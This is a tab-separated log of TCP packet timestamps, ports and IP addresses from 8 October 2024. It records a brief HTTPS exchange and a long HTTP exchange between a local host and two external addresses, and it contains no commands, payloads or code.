Oct 8, 2024 03:52:42.935206890 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:42.935259104 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.939105034 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:42.983417034 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:43.269565105 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:43.269757032 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.269778967 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:43.269802094 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:43.270005941 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.270005941 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.270934105 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.270956039 CEST	443	60060	172.67.179.207	192.168.2.4
Oct 8, 2024 03:52:43.270967960 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.271015882 CEST	60060	443	192.168.2.4	172.67.179.207
Oct 8, 2024 03:52:43.391993999 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:43.396826982 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:43.396900892 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:43.397056103 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:43.401861906 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114233971 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114278078 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114286900 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114403963 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114413023 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114422083 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114429951 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114429951 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114430904 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114438057 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114516020 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114516020 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114516020 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114552021 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114561081 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.114597082 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.114597082 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.119333029 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.119342089 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.119421005 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.119443893 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.119585037 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.241759062 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241925001 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241933107 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241939068 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241949081 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241956949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.241966963 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242237091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.242237091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.242238045 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.242441893 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242485046 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242495060 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242583990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242594004 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242604017 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.242712975 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.242712975 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.243448019 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243515968 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243530035 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243537903 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243602037 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243611097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.243633986 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.243633986 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.243666887 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.244522095 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.244585037 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.244653940 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.244714975 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.244837046 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.244896889 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.245035887 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.245085001 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.248024940 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.248171091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.248191118 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.248291016 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.369646072 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369724035 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369772911 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369817019 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369857073 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.369889021 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.369916916 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369957924 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.369993925 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370013952 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370053053 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370116949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370161057 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370206118 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370249987 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370286942 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370332003 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370354891 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370414972 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370460987 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370502949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370517015 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370532990 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370554924 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370599985 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370645046 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370696068 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370709896 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370738983 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370768070 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370820045 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370832920 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370861053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370891094 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.370938063 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.370954990 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371000051 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371017933 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371062994 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371082067 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371126890 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371144056 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371189117 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371207952 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371238947 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371285915 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371337891 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371365070 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371464014 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371505022 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371551991 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371570110 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371620893 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371635914 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371659040 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371696949 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371746063 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371797085 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371809959 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371850967 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371896029 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371912956 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.371956110 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.371975899 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372021914 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372072935 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372098923 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372163057 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372205019 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372226954 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372270107 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372322083 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372349024 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372385979 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372411966 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372456074 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372498989 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372522116 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372565985 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372606039 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.372632027 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.372668982 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.377741098 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.377815962 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.377851009 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.378062010 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.496994019 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497194052 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497260094 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497289896 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497319937 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497368097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497415066 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497462034 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497482061 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497528076 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497576952 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497594118 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497633934 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497675896 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497740984 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497788906 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497802019 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497827053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497881889 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.497936010 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.497961998 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498008013 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498028994 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498069048 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498094082 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498112917 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498164892 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498214960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498255968 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498277903 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498332024 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498346090 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498388052 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498414040 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498433113 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498460054 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498505116 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498528957 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498544931 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498572111 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498611927 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498652935 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498676062 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498737097 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498783112 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498800039 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498861074 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498903036 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.498924971 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.498985052 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499030113 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499047995 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499085903 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499109983 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499154091 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499195099 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499217987 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499260902 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499300003 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499325991 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499370098 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499466896 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499514103 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499561071 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499587059 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499600887 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499630928 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499697924 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499712944 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499737024 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499773979 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499826908 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499854088 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499901056 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.499943018 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.499963999 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500008106 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500032902 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500046968 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500076056 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500114918 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500138998 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500180960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500222921 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500243902 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500287056 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500328064 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500349998 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500391006 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500412941 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500459909 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500499964 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500521898 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500566006 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500606060 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500627995 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500667095 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500689983 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500734091 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500772953 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500797033 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500840902 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500880957 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500902891 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.500941038 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.500966072 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.503576994 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.506526947 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506608009 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506669998 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.506697893 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506771088 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506819010 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506840944 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.506866932 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.506922960 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.506975889 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507029057 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507056952 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507103920 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507155895 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507169008 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507200956 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507247925 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507313013 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507356882 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507379055 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507458925 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507507086 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507524967 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507566929 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507591963 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507637978 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507685900 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507703066 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507752895 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507801056 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507822037 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507862091 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507884026 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507930994 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.507977009 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.507997036 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.508043051 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.508085012 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.587655067 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.587727070 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.587768078 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.587795019 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.587820053 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.587865114 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.587924957 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.587969065 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.587997913 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588037968 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588057041 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588094950 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588134050 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588181973 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588198900 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588248014 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588273048 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588310957 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588335991 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588380098 CEST	60061	80	192.168.2.4	176.113.115.37
Oct 8, 2024 03:52:44.588397026 CEST	80	60061	176.113.115.37	192.168.2.4
Oct 8, 2024 03:52:44.588437080 CEST	60061	80	192.168.2.4	176.113.115.37
